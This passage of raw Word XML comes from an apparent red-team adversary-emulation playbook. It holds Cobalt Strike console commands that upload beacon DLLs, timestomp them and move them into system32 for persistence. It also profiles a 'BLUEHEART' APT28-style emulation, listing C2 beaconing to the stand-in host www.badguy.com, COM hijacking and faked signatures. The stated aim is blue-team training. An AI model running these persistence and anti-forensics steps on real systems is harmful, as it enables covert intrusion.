        <w:t>Verify time matches surrounding files (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TimeStomp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> if needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAF552D" w14:textId="77777777" w:rsidR="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>PERSISTENCE STEPS (VIA COBALTSTRIKE BEACON CONSOLE)</w:t>
      </w:r>
      <w:hyperlink r:id="rId100" w:anchor="persistence-steps-via-cobaltstrike-beacon-console" w:tooltip="Direct link to heading" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="24636149" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>cd c:\windows\temp</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>upload /data/5-PAYLOADS/wlbsctrl.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>upload /data/5-PAYLOADS/services1.dll (DNS Beacon)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>upload /data/5-PAYLOADS/services2.dll (SMB Beacon)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>shell mv services(1/2).dll services.dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>-import /data/PAYLOADS/Set-FileTimeStamps.ps1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>FileTimeStamps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> c:\windows\temp\wlbsctrl.dll "7/13/2009 08:41:22 PM"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>FileTimeStamps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> c:\windows\temp\services.dll "7/13/2009 08:41:22 PM"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>shell move c:\windows\temp\wlbsctrl.dll c:\windows\system32</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="token"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>shell move c:\windows\temp\services.dll c:\windows\system32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A75650D" w14:textId="77777777" w:rsidR="00D72461" w:rsidRDefault="00D72461" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53C3E31F" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C7B94A8" w14:textId="31D66BC8" w:rsidR="00D72461" w:rsidRPr="00BB134D" w:rsidRDefault="00D72461" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>THREAT PROFILE (BLUEHEART)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442ECD80" w14:textId="77777777" w:rsidR="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>DESCRIPTION</w:t>
      </w:r>
      <w:hyperlink r:id="rId101" w:anchor="description" w:tooltip="Direct link to heading" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="528E8C81" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">BLUEHEART was inspired on APT28 malware using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>CobaltStrike</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve"> malleable C2 profiles, custom metadata, and TTPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B10502" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GOAL AND INTENT</w:t>
      </w:r>
      <w:hyperlink r:id="rId102" w:anchor="goal-and-intent" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3F19F6E4" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Emulate TTPs of a realistic adversary to exist on a target network and provide a blue team the opportunity to exercise defensive TTPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62216883" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>KEY IOCS</w:t>
      </w:r>
      <w:hyperlink r:id="rId103" w:anchor="key-iocs" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="36B341B5" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>User level C2 Agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EC879C" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Custom </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CobaltStrike</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Malleable C2 profile to mimic CHOPSTICK IOCs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1B30C2" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Persistence: COM Object Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642A4815" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>File: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8BB00"/>
        </w:rPr>
        <w:t>C:\Users\Public\Libraries\apphelp.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451C4404" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HTTP Traffic to </w:t>
      </w:r>
      <w:hyperlink r:id="rId104" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D72461">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>www.badguy.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="686A26FE" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Beacons every 60 seconds - 30% jitter User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gecko</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4B66BA6F" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Modified Date/Time Stamp (Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText>HYPERLINK "https://github.com/threatexpress/metatwin" \t "_blank"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MetaTwin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0B1E33" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Custom Binary metadata using valid Microsoft </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>signature</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="28925741" w14:textId="77777777" w:rsidR="00D72461" w:rsidRPr="00D72461" w:rsidRDefault="00D72461" w:rsidP="00D72461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72461">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
